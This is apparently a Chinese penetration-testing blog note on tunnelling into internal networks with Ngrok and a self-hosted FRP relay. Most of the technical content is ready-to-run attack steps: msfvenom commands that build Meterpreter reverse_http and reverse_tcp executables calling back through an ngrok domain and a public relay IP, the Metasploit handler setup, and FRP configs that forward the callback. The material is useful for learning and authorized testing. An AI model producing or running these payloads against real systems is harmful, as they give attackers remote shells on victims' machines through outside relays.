这篇文章上次修改于 185 天前,可能其部分内容已经发生变化,如有疑问可询问作者。

CS和MSF的session去攻击内网主机的话,它回弹的是给的那台外部主机,我们只有通过那台外部主机才能够去获取到内网主机的信息,但是一旦内网主机多了,或者说还有更深一层内网,这个时候就使得操作复杂度更高了。这个时候我们可以利用隧道代理技术,将操作变得简化一些,虽然走的还是那台外部主机,不过操作上会变得简便很多。

反向代理,就是exe文件执行上线
正向代理,就是目标主机把cmd开放在它的一个端口上,然后我们去连接

代理就是字面意思,隧道是为了防止防火墙等流量过滤而产生的一个绕过方法

内网穿透 Ngrok 测试演示-两个内网通讯上线

kali的话我们一般下载amdx64
QQ截图20211108103155.jpg
windows10虚拟机设置为主机模式就可以认为是一个内网环境了(只和物理机通信)
但是这不是我们想要的,我们想要的是两台主机都能上网,但是互相不能连接
这个时候我们拉黑ip就行
QQ截图20211108103407.jpg
sudo iptables -I INPUT -s 211.1.0.0 -j DROP
https://ngrok.cc/ 不是cn
QQ截图20211108104649.jpg
./sunny clientid bd38fd3839
QQ截图20211108110433.jpg
msfvenom -p windows/meterpreter/reverse_http lhost=yingsexigua.free.idcfengye.com lport=80 -f exe -o
test.exe
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.76.132
set lport 4444
exploit

内网穿透 Frp 自建跳板测试-两个内网通讯上线

自行搭建,方便修改,成本低,使用多样化
QQ截图20211108112602.jpg
QQ截图20211108112728.jpg
1.服务端-下载-解压-修改-启动(阿里云主机记得修改安全组配置出入口)
服务器修改配置文件 frps.ini:
[common]
bind_port = 6677
启动服务端:
./frps -c ./frps.ini
2.控制端-下载-解压-修改-启动
控制端修改配置文件 frpc.ini:
[common]
server_addr = 你的云主机 ip
server_port = 6677 frpc 工作端口,必须和上面 frps 保持一致(这个是用于建立通信的)
[msf]
type = tcp
local_ip = 127.0.0.1
local_port = 5555 转发给本机的 5555(kali这边的通道是5555)
remote_port = 6000 这个是目标机的通道,是目标机那边的后门打到服务器上的端口
启动客户端:
./frpc -c ./frpc.ini(要先启动服务端才能启动客户端)

msfvenom -p windows/meterpreter/reverse_tcp lhost=101.37.160.211 lport=6000 -f exe -o frp.exe
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 5555
exploit

CNAME就是一个域名解析到另一个域名上
就是看CDN这样子的
访问一个网站,然后解析到另一网址上,在这个网址上才是可以解析到IP上的